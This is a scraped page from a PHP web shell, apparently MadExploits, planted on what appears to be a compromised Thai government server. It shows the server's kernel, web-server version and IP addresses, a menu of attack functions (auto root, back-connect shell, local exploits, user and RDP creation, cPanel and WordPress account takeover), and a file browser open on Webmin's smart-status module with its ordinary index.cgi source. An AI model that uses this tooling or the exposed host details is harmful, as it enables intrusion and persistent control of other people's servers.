Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
smart-status /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
1.34
KB
-rw-r--r--
action.cgi
810
B
-rwxr-xr-x
config
41
B
-rw-r--r--
config-CentOS-Linux-5.0-6.9
41
B
-rw-r--r--
config-Redhat-Enterprise-Linux...
41
B
-rw-r--r--
config.info
221
B
-rw-r--r--
config.info.ca
257
B
-rw-r--r--
config.info.ca.UTF-8
264
B
-rw-r--r--
config.info.cz
0
B
-rw-r--r--
config.info.de
265
B
-rw-r--r--
config.info.de.UTF-8
265
B
-rw-r--r--
config.info.es
174
B
-rw-r--r--
config.info.es.UTF-8
174
B
-rw-r--r--
config.info.fr
0
B
-rw-r--r--
config.info.ms_MY
245
B
-rw-r--r--
config.info.ms_MY.UTF-8
245
B
-rw-r--r--
config.info.nl
259
B
-rw-r--r--
config.info.nl.UTF-8
259
B
-rw-r--r--
config.info.no
234
B
-rw-r--r--
config.info.no.UTF-8
234
B
-rw-r--r--
config.info.ru.UTF-8
360
B
-rw-r--r--
config.info.ru_RU
238
B
-rw-r--r--
config.info.ru_RU.UTF-8
360
B
-rw-r--r--
config.info.ru_SU
238
B
-rw-r--r--
index.cgi
4.37
KB
-rwxr-xr-x
install_check.pl
343
B
-rwxr-xr-x
module.info
195
B
-rw-r--r--
module.info.ca
136
B
-rw-r--r--
module.info.ca.UTF-8
148
B
-rw-r--r--
module.info.cz
25
B
-rw-r--r--
module.info.cz.UTF-8
32
B
-rw-r--r--
module.info.de
156
B
-rw-r--r--
module.info.de.UTF-8
168
B
-rw-r--r--
module.info.es
37
B
-rw-r--r--
module.info.es.UTF-8
43
B
-rw-r--r--
module.info.ms_MY
123
B
-rw-r--r--
module.info.ms_MY.UTF-8
135
B
-rw-r--r--
module.info.nl
27
B
-rw-r--r--
module.info.nl.UTF-8
33
B
-rw-r--r--
module.info.no
25
B
-rw-r--r--
module.info.no.UTF-8
31
B
-rw-r--r--
module.info.ru.UTF-8
52
B
-rw-r--r--
module.info.ru_RU
34
B
-rw-r--r--
module.info.ru_RU.UTF-8
55
B
-rw-r--r--
module.info.ru_SU
34
B
-rw-r--r--
module.info.sk
26
B
-rw-r--r--
module.info.sk.UTF-8
32
B
-rw-r--r--
smart-status-lib.pl
12.72
KB
-rwxr-xr-x
status_monitor.pl
4.03
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.cgi
#!/usr/bin/perl # Show all drives and their SMART status require './smart-status-lib.pl'; &ReadParse(); # Make sure SMART commands are installed if (!&has_command($config{'smartctl'})) { &ui_print_header(undef, $text{'index_title'}, "", undef, 1, 1); &ui_print_endpage( &ui_config_link('index_ecmd', [ "<tt>$config{'smartctl'}</tt>", undef ])); } # Show the version $ver = &get_smart_version(); if (!$ver) { &ui_print_header(undef, $text{'index_title'}, "", undef, 1, 1); &ui_print_endpage( &ui_config_link('index_ecmd2', [ "<tt>$config{'smartctl'}</tt>", undef ])); } &ui_print_header(undef, $text{'index_title'}, "", undef, 1, 1, 0, &help_search_link("smartctl", "man", "doc", "google"), undef, undef, &text('index_version', $ver)); # Get list of drives @drives = &list_smart_disks_partitions(); if (!@drives) { &ui_print_endpage($text{'index_eidescsi'}); } if ($config{'mode'} == 1 || $in{'drive'}) { # Just show one drive, selected from menu print &ui_form_start("index.cgi"); print "<b>$text{'index_show'}</b>\n"; print &ui_select("drive", $in{'drive'}, [ map { [ $_->{'device'}.":".$_->{'subdisk'}, $_->{'desc'}.($_->{'model'} ? " ($_->{'model'})" : "") ] } @drives ], 1, 0, 0, 0, "onChange='form.submit()'"); print &ui_submit($text{'index_ok'}),"\n"; print &ui_form_end(); if ($in{'drive'}) { ($device, $subdisk) = split(/:/, $in{'drive'}); ($d) = grep { $_->{'device'} eq $device && $_->{'subdisk'} == $subdisk } @drives; &show_drive($d); } } else { # Show all IDE drives foreach $d (@drives) { &show_drive($d); } } &ui_print_footer("/", $text{'index'}); # show_drive(&drive) sub show_drive { print &ui_form_start("action.cgi"); print &ui_hidden("drive", $_[0]->{'device'}); print &ui_hidden("subdisk", $_[0]->{'subdisk'}); local $h = defined($_[0]->{'subdisk'}) ? &text('index_drivesub', "<tt>$_[0]->{'device'}</tt>", $_[0]->{'subdisk'}) : &text('index_drive', "<tt>$_[0]->{'device'}</tt>"); print &ui_table_start($h, "width=100%", 4, [ "width=30%", undef, "width=30%", undef ]); local $st = &get_drive_status($_[0]->{'device'}, $_[0]); print &ui_table_row($text{'index_desc'}, $_[0]->{'desc'}); if ($_[0]->{'cylsize'}) { print &ui_table_row($text{'index_size'}, &nice_size($_[0]->{'cylinders'}*$_[0]->{'cylsize'})); } if ($_[0]->{'model'}) { print &ui_table_row($text{'index_model'}, $_[0]->{'model'}); } print &ui_table_row($text{'index_support'}, $st->{'support'} ? $text{'yes'} : $text{'no'}); print &ui_table_row($text{'index_enabled'}, $st->{'enabled'} ? $text{'yes'} : $text{'no'}); if ($st->{'support'} && $st->{'enabled'}) { if ($st->{'errors'}) { print &ui_table_row($text{'index_errors'}, "<font color=#ff0000>". &text('index_ecount', $st->{'errors'}). "</font>"); } print &ui_table_row($text{'index_check'}, $st->{'check'} ? $text{'yes'} : "<font color=#ff0000>$text{'no'}</font>"); } if ($st->{'family'}) { print &ui_table_row($text{'index_family'}, $st->{'family'}); } if ($st->{'model'}) { print &ui_table_row($text{'index_model'}, $st->{'model'}); } if ($st->{'serial'}) { print &ui_table_row($text{'index_serial'}, $st->{'serial'}); } if ($st->{'capacity'}) { print &ui_table_row($text{'index_capacity'}, $st->{'capacity'}); } print &ui_table_end(); # Show extra attributes if ($config{'attribs'} && @{$st->{'attribs'}}) { $attrs_count++; print &ui_hidden_table_start($text{'index_attrs'}, "width=100%", 2, "attrs".$attrs_count, 1, [ "width=30%" ]); foreach my $a (@{$st->{'attribs'}}) { next if ($a->[0] =~ /UDMA CRC Error Count/i); # too long print &ui_table_row($a->[0], ($a->[2] =~ /^\s*(seconds|minutes|hours|days|months|years|weeks)\s*/i || !$a->[2] ? $a->[1]." ".$a->[2] : $a->[2]). ($a->[3] ? " ($text{'index_norm'} $a->[3])" : "")); } print &ui_hidden_table_end(); } # Show raw data from smartctl if ($config{'attribs'} && $st->{'raw'}) { $raw_count++; print &ui_hidden_table_start($text{'index_raw'}, "width=100%", 2, "raw".$raw_count, @{$st->{'attribs'}} ? 0 : 1); print &ui_table_row(undef, "<pre>".&html_escape($st->{'raw'})."</pre>", 2); print &ui_hidden_table_end(); } if ($st->{'support'} && $st->{'enabled'}) { print &ui_form_end([ [ "short", $text{'index_short'} ], [ "ext", $text{'index_ext'} ], [ "data", $text{'index_data'} ] ]); } else { print &ui_form_end(); } }
Close